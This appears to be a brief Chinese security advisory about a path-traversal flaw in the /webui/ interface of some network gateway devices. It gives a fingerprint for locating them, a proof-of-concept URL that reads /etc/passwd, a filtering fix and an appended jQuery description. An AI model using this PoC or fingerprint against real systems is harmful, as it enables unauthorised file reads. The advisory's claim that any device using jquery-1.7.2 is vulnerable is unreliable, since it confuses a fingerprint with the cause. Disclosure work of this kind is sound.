body="webui/js/jquerylib/jquery-1.7.2.min.js"

危害级别：中

漏洞复现

POC：

/webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down

除此之外，像安博通深度安全网关等使用jquery-1.7.2 JavaScript代码库（框架）的设备同样存在此漏洞

修复建议

临时修复：在防火墙中添加../../参数及相关变形的过滤规则。

goby&nuclei检测

公众号回复“jquery-1.7.2”获取，供运维人员用于检测。

最后附百度百科：

jQuery是一个快速、简洁的JavaScript框架，是继Prototype之后又一个优秀的JavaScript代码库（框架）于2006年1月由John Resig发布。jQuery设计的宗旨是“write Less，Do More”，即倡导写更少的代码，做更多的事情。它封装JavaScript常用的功能代码，提供一种简便的JavaScript设计模式，优化HTML文档操作、事件处理、动画设计和Ajax交互。

jQuery的核心特性可以总结为：具有独特的链式语法和短小清晰的多功能接口；具有高效灵活的CSS选择器，并且可对CSS选择器进行扩展；拥有便捷的插件扩展机制和丰富的插件。jQuery兼容各种主流浏览器，如IE 6.0+、FF 1.5+、Safari 2.0+、Opera 9.0+等。 [1]